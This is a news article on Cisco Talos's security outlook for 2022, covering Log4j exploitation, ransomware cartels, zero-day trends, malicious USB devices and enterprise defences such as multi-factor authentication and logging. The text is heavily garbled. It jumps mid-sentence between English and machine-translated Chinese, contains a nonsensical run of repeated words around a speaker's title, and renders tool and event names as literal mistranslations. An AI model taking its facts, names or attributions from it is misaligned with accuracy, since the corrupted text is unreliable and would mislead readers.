2022 will be another busy year for enterprise incident responders as ransomware, supply chain and myriad zero-day attacks will continue to rise, according to Cisco's Talos security experts.
To help address the threats, the Cisco Talos team used a blog and online presentation to detail steps enterprises can take to defend themselves against the growing field of bad actors and also to point out lessons learned from recent damaging exploits such as the Log4j vulnerability andMicrosoft Exchange server zero-day threats.
Once, zero-day attacks were typically launched by state actors against service providers, but those days are gone, wrote Nick Biasini head of outreach at Cisco Talos in a博客关于2022年的安全格局。现在,新的,经验丰富的战斗人员使用较少的手术攻击寻求更广泛的目标。他写道:“这导致了比我们历史上看到的更大的风险行为,而没有对附带损害的多大关注。”
这些国家行为者也改变了他们的策略。现在,他们还没有专注于针对其他国家的间谍活动,而是针对旨在破坏和破坏的攻击的持不同政见者和激进主义者。同时,由于他们能够通过加密货币轻易收集的数十亿美元,犯罪企业已成为更大的威胁。“作为捍卫者,我们从未面临过更多的挑战……” Biasini说。
Some of the biggest challenges for 2022 include ongoing problems such aslog4j和ransomware.
未列出的log4j仍然是一个威胁
Log4J软件在企业和消费者服务,网站和应用程序中广泛使用,作为支持客户/服务器应用程序开发的易于使用的实用程序。But it has weakneses如果被利用的话,可以让未经验证的远程参与者控制受影响的服务器系统,并获得对公司信息的访问或释放拒绝服务攻击。
Cisco Cisco Cyber Cyber Cyber Cyber Cyber Cyber Cyber Thriance Prainistic Analleance in in Neil Jenkins Cyber网络网络威胁联盟首席分析官说,Cisco Telemetry已检测到攻击者在脆弱的VMware Horizon服务器中利用这些弱点,并以恶意有效载荷感染了包括钴罢工在内的恶意有效载荷,这是一种工具,旨在帮助渗透测试者保护网络,但也由攻击者使用。在线演示文稿。尽管有警告要对Log4J进行修补,但并非所有人都这样做,“仍然有威胁行为者,特别是高级威胁行为者,他们可能希望将来针对这些脆弱性。”
思科塔洛斯(Cisco Talos)表示,Log4J将被广泛利用,因此用户应尽快修补受影响的产品并实施缓解解决方案。
Ransomware still a scourge
With the exception of Q1, ransomware took up nearly 50% of all the threats that Talos tracked in 2021, thanks to the lure of lucrative payouts from ransomware victims. In turn, some of that cash will help ransomware cartels develop more sophisticated approaches. “As we saw with [supply chain attack]Kaseya, these cartels have the ability to purchase or develop zero-days to be leveraged in attacks, a trend that should concern us all and another reason why behavioral protection will continue to be an important aspect of detection in 2022 and beyond,” Biasini stated.
另一个问题是越来越多的勒索软件玩家。詹金斯说,在2021年初,许多袭击来自一组,但到年底,至少有13个不同的袭击。
“Even with one family, you have a lot of different affiliates who are using different tactics, so even with one dominant family, you can see still see a diversification and the types of attacks and the types of tooling they’ll use,” Jenkins said.
There are other factors that could change the ransomware landscape—the US government’s anti-ransomware initiatives for one—as well as the scrutiny these groups are getting from law enforcement around the globe, Jenkins said. Larger ransomware groups might fragment to be less detectable, and open-source ransomware developers may have a more difficult time as some of their forums are shut down. As a result, the attackers might choose smaller targets to avoid the publicity and attention from law-enforcement that larger attacks might draw, Jenkins said.
詹金斯说,最好的保护是保持网络防御最佳实践,例如离线备份,建立多因素身份验证以及制定事件响应计划。
Zero day is here to stay
There has been a dramatic increase in zero-day attacks, with more than 50 discovered in the wild during 2021—more than in all of 2019 and 2020 combined, Biasini stated.
零日子仍然是丰富的攻击来源。在最近的天富杯黑客比赛in China, there were no less than 30 successful exploits demonstrated against the short list of targets, including a handful that affected the latest versions of Windows and iOS. All of them were likely reported to the由于最近的法规变化,中国政府Biasini说,这可能会产生后果。最新的例子是阿里巴巴受到中国政府的处罚not disclosing Log4j to them in advance他说。
当心可疑USB
另一个有趣的发展是安全领域中最古老的漏洞之一 - 使用恶意USB设备。
“Starting in 2021, even carrying into this year, there has been an uptick of malicious USBs used as a means of initial access, which is a true blast from the past,” Jenkins said. “But just a reminder that even these old, outdated attack vectors can still be used, and still have success.”
企业最佳实践
Cisco Talos researchers did have recommendations for enterprise incident response.
修补,库存,细分培训以及制定事件响应计划都很重要,但是思科专家有一个主要建议:研究所多因素身份验证。詹金斯说:“我们确定缺乏MFA可能是企业安全最大的障碍之一。”“ MFA可能避免了许多勒索软件事件。因此,我们绝对鼓励您尽可能,尤其是在敏感系统上,尽快提高MFA。”
其他一些想法:
- 保留准确的资产列表,当前文档和政策,尤其是与修补有关的资产列表。在事件响应方面,这些都是基本的。“您想要的最后一件事是处于活跃事件中间,以发现您没有准确的资产清单,或者您六个月没有修补任何东西。确保实施网络细分和适当的访问控制等基本面将限制违规的影响。”思科说。
- 考虑软件选项时,从供应商那里获取软件材料清单(SBOM)。这应该可以快速确定特定库或开源软件中的脆弱性如何改变日常操作,并希望可以做出更彻底和周到的响应。
- Plan based on the idea you will be breached at some point. Create a cybersecurity incident response plan that includes all the stakeholders in the process. During an incident, every minute counts, making it crucial that the appropriate departments are ready to make decisions and take actions so containment can happen as soon as possible. Preparing and practicing your processes related to an incident can make the difference between mitigating a compromised system and suffering a total breach.
- 启用记录。这可能很困难且昂贵,但是当您从事事件时,启用记录至关重要。没有它,您可能永远无法确定诸如初始感染矢量或零患者之类的事情。思科说,如果多个参与者能够滥用同样未被发现的弱点,这些失败可能会造成灾难性。